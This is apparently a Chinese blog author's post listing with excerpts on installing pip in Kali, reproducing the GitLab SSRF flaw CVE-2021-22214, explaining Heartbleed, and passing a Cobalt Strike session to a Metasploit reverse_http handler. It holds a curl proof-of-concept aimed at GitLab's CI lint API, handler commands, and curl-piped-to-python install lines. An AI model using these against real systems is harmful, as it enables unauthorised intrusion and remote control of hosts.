![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Kali
内蒙古打野
这个作者很懒,什么都没留下…
展开
-
kali 安装pip命令
安装pip3curl -s https://bootstrap.pypa.io/get-pip.py | python3安装pip2curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py | python检测安装pip -V原创 2021-12-17 11:45:03 · 892 阅读 · 0 评论 -
CVE-2021-22214 Gitlab_SSRF
CVE-2021-22214 Gitlab_SSRF漏洞复现:目标地址:https://gitlab.xxx.xxx/users/sign_inPOCcurl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw原创 2021-12-15 10:58:50 · 2697 阅读 · 0 评论 -
心脏滴血(CVE-2014-0160)
心脏滴血(CVE-2014-0160)漏洞范围:OpenSSL1.0.1版本漏洞成因:Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞危害:如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。漏洞复现:原创 2021-12-15 10:55:00 · 3369 阅读 · 0 评论 -
Cobalt strike 派生shell给MSF
Cobalt strike 派生shell给MSF,前提是要有beaconshell:在msf使用监听模块,并设置相关选项:use exploit/multi/handleset payload windows/meterpreter/reverse_httpset lhost 10.6.18.56set lport 4321run -j回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监原创 2020-10-22 20:05:19 · 471 阅读 · 0 评论 -
Kali Linux的安装简单易懂
这里写自定义目录标题Kali Linux的安装Kali Linux的安装安装Kali Linux(VMware Workstation)Linux安装的方式现如今已经非常的“傻瓜”化,只需轻点几下鼠标,就可以完成整个系统的安装过程。Kali Linux操作系统的安装也非常简单。本节介绍安装Kali Linux的详细过程。VMware Workstation是VMware公司推出的一款功能强大的桌面虚拟计算软件。此软件能够提供虚拟机功能,从而允许用户在单一的桌面上同时运行多个不同的操作系统,以及进行开原创 2020-10-18 10:41:08 · 302 阅读 · 0 评论